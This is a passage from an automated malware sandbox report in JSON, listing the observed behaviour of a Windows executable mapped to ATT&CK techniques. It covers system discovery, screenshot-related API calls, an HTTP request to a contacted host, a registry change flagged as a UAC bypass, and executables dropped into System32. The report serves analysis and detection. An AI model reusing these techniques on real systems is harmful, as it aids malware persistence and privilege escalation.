\"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001900d0411900cb4119000000000000000000000016000000000134dc12000000000098e9120095e11f77c1470700feffffff435c237750592377aa000000b8000000ca411900c8411900bcdd1200f4e11200000000000000000000000000000000000000000000000000e00a0000000016001c5c227760d83675ffffffff170000006cdd120024000000030000005ce2120088e71200f4e112008600000098dd120096ed2377f2411900a06af97486000000bcdd1200f4e112000000000086008800a06af974bcdd1200916cf974f2411900a06af974a06af9742ce2120002020000 (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005944)\n \"rundll32.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004384)\n \"rundll32.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004384)\n \"rundll32.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dcf21200000000003c0000002cf31200feffffffb4f21200cf002477d6002477109036773c0000001e0000002cf312000000000088f2120000000000f0f21200 (UID: 00000000-00004384)\n \"rundll32.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000054f1120064ef1200340000c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002c0038ac31002000000028f012003c000e000600000004f012001c56237738ac3100e0ab31000100000030ac3100e8ef120000292377bcf0120030f012000000000030ac3100fcef12005c55237700002c000000000038ac31000cf01200675523770000000080f012004bde39770000000053de39772713b18400000000000000001cf31200080009004019b1760000000000000000 (UID: 00000000-00004384)\n \"rundll32.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000003677340000c020f2120000f3120044f1120000000000e0f1120095e11f77d47a0700feffffffec3823773dd139776dd139775712b1841c17b176000000000000000020000000f8f1120020f212000000000000002c0018a1310018a13100180000000c00c000af030000180000008801000020f21200389b3100060000000cf212000000000000000000000000006cf21200000000006cf21200148e3877000000001c8e3877cb11b1840000000001000000400432000200000058f21200000000000000000079dc3977ff11b1840000000001000000400432000000000000000000 (UID: 00000000-00004384)\n \"rundll32.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000054f1120064ef1200340000c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002c0038ac31002000000028f012003c000e000a00000004f012001c56237738ac3100e0ab31000100000030ac3100e8ef120000292377bcf0120030f012000000000030ac3100fcef12005c55237700002c000000000038ac31000cf01200675523770000000080f012004bde39770000000053de39772713b18401000000000000001cf31200080009004019b1760000000000000000 (UID: 00000000-00004384)\n \"rundll32.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000054f1120064ef1200340000c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002c0038ac31002000000028f012003c000e001200000004f012001c56237738ac3100e0ab31000100000030ac3100e8ef120000292377bcf0120030f012000000000030ac3100fcef12005c55237700002c000000000038ac31000cf01200675523770000000080f012004bde39770000000053de39772713b18403000000000000001cf31200080009004019b1760000000000000000 (UID: 00000000-00004384)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"IsWow64Process\" with parameter \"5944\" - (UID: 00000000-00005944)\n \"rundll32.exe\" called \"IsWow64Process\" with parameter \"4384\" - (UID: 00000000-00004384)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005944)\n \"rundll32.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00004384)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetForegroundWindow\" (UID: 00000000-00005944)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-148", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve account information for specified SID", "description": "\"rundll32.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00004384)", "origin": "API Call", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-130", "type": 3, "relevance": 1, "name": "Queries TCP/IP interface details", "description": "\"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"ENABLEDHCP\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"REGISTRATIONENABLED\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"REGISTERADAPTERNAME\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DOMAIN\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DHCPDOMAIN\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"ENABLEDHCP\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"REGISTRATIONENABLED\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"REGISTERADAPTERNAME\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"DOMAIN\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"DHCPDOMAIN\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-1", "type": 3, "relevance": 5, "name": "Reads the cryptographic machine GUID", "description": "\"rundll32.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"rundll32.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system\\*.* (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"FindNextFileW\" with parameter avicap.dll (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"FindNextFileW\" with parameter avifile.dll (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"FindNextFileW\" with parameter COMMDLG.DLL (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"FindNextFileW\" with parameter keyboard.drv (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"FindNextFileW\" with parameter lzexpand.dll (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"FindNextFileW\" with parameter mciavi.drv (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"FindNextFileW\" with parameter mciseq.drv (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"FindNextFileW\" with parameter mciwave.drv (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"FindNextFileW\" with parameter MMSYSTEM.DLL (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"FindNextFileW\" with parameter mmtask.tsk (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"FindNextFileW\" with parameter mouse.drv (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"FindNextFileW\" with parameter msvideo.dll (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"FindNextFileW\" with parameter olecli.dll (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"FindNextFileW\" with parameter OLESVR.DLL (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"FindNextFileW\" with parameter rundll32.exe (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"FindNextFileW\" with parameter SHELL.DLL (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"FindNextFileW\" with parameter sound.drv (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"FindNextFileW\" with parameter stdole.tlb (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"FindNextFileW\" with parameter system.drv (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"FindNextFileW\" with parameter TIMER.DRV (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"FindNextFileW\" with parameter ver.dll (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"FindNextFileW\" with parameter vga.drv (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"FindNextFileW\" with parameter WFWNET.DRV (UID: 00000000-00005944)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-105", "type": 6, "relevance": 3, "name": "Calls an API possibly used to take screenshots", "description": "\"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"738265902\"\n \"cx\": \"325\"\n \"cy\": \"25\"}\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1124141689\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1291914181\"\n \"cx\": \"325\"\n \"cy\": \"25\"}", "origin": "API Call", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"2\"\n \"th32ProcessID\": \"0\"}\n \"rundll32.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-219", "type": 6, "relevance": 3, "name": "Calls an API typically used to register an interface (RPC)", "description": "\"rundll32.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00004384)", "origin": "API Call", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-143", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a new HTTP request", "description": "\"rundll32.exe\" called \"HttpOpenRequestW\" with parameter HTTP method:\"GET\" object: /article.php?id=103822\" - (UID: 00000000-00004384)", "origin": "API Call", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-199", "type": 6, "relevance": 1, "name": "Calls an API used to connect to internet", "description": "\"rundll32.exe\" called \"InternetOpenA with parameter Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)\" (UID: 00000000-00004384)\n \"rundll32.exe\" called \"InternetOpenW with parameter Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729;\" (UID: 00000000-00004384)", "origin": "API Call", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-62", "type": 7, "relevance": 1, "name": "Communicates with HTTP webserver (GET/POST requests)", "description": "Found http requests in header \"GET /article.php?id=103822\"", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "network-60", "type": 7, "relevance": 1, "name": "HTTP requests contain Base64 strings", "description": "Contains base64 string in header \"/article\" in header \"GET /article.php?id=103822 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)Host: www.zigui.orgConnection: Keep-Alive\"\n Contains base64 string in header \"Encoding\" in header \"GET /article.php?id=103822 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)Host: www.zigui.orgConnection: Keep-Alive\"\n Contains base64 string in header \"gzip\" in header \"GET /article.php?id=103822 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)Host: www.zigui.orgConnection: Keep-Alive\"\n Contains base64 string in header \"MSIE\" in header \"GET /article.php?id=103822 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)Host: www.zigui.orgConnection: Keep-Alive\"\n Contains base64 string in header \"NET4\" in header \"GET /article.php?id=103822 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)Host: www.zigui.orgConnection: Keep-Alive\"\n Contains base64 string in header \"InfoPath\" in header \"GET /article.php?id=103822 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)Host: www.zigui.orgConnection: Keep-Alive\"\n Contains base64 string in header \"Host\" in header \"GET /article.php?id=103822 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)Host: www.zigui.orgConnection: Keep-Alive\"\n Contains base64 string in header \"Keep\" in header \"GET /article.php?id=103822 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)Host: www.zigui.orgConnection: Keep-Alive\"", "origin": "Network Traffic", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-159", "type": 3, "relevance": 1, "name": "Modifies windows command shell related registry path (UAC Bypass)", "description": "\"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\EXEFILE\\SHELL\\OPEN\\COMMAND\"; Key: \"(DEFAULT)\"; Value: \"\"%1\" %*\"), \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\EXEFILE\\SHELL\\OPEN\\COMMAND\"; Key: \"(DEFAULT)\"; Value: \"A200AB0020002200250031002200200025002A000000\"), \"rundll32.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\EXEFILE\\SHELL\\OPEN\\COMMAND\"; Key: \"(DEFAULT)\"; Value: \"A200AB0020002200250031002200200025002A000000\")", "origin": "Registry Access", "attck_id": "T1548.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548/002"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK\\PARAMETERS\"; Key: \"TRANSPORTS\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"MAPPING\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\PSCHED\\PARAMETERS\\WINSOCK\"; Key: \"MAPPING\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK\\SETUP MIGRATION\\PROVIDERS\\PSCHED\"; Key: \"WINSOCK 2.0 PROVIDER ID\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\WINSOCK\"; Key: \"MAPPING\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK\\SETUP MIGRATION\\PROVIDERS\\TCPIP\"; Key: \"WINSOCK 2.0 PROVIDER ID\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\WINSOCK\"; Key: \"MINSOCKADDRLENGTH\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\WINSOCK\"; Key: \"MAXSOCKADDRLENGTH\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\WINSOCK\"; Key: \"USEDELAYEDACCEPTANCE\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\WINSOCK\"; Key: \"HELPERDLLNAME\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\"; Key: \"HOSTNAME\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\"; Key: \"DOMAIN\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"AUTODIALDLL\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-67", "type": 3, "relevance": 10, "name": "Creates or modifies windows services", "description": "\"rundll32.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\")", "origin": "Registry Access", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" wrote 4096 bytes starting with PE header signature to file \"C:\\Windows\\System32\\¢«.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" wrote 4096 bytes starting with PE header signature to file \"C:\\Windows\\System32\\notepad¢¬.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" wrote 4096 bytes starting with PE header signature to file \"C:\\Windows\\system\\rundll32.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"notepad_.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"_.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"RUNDLL32.EXE.67A47D15.bin\" has type \"PE32 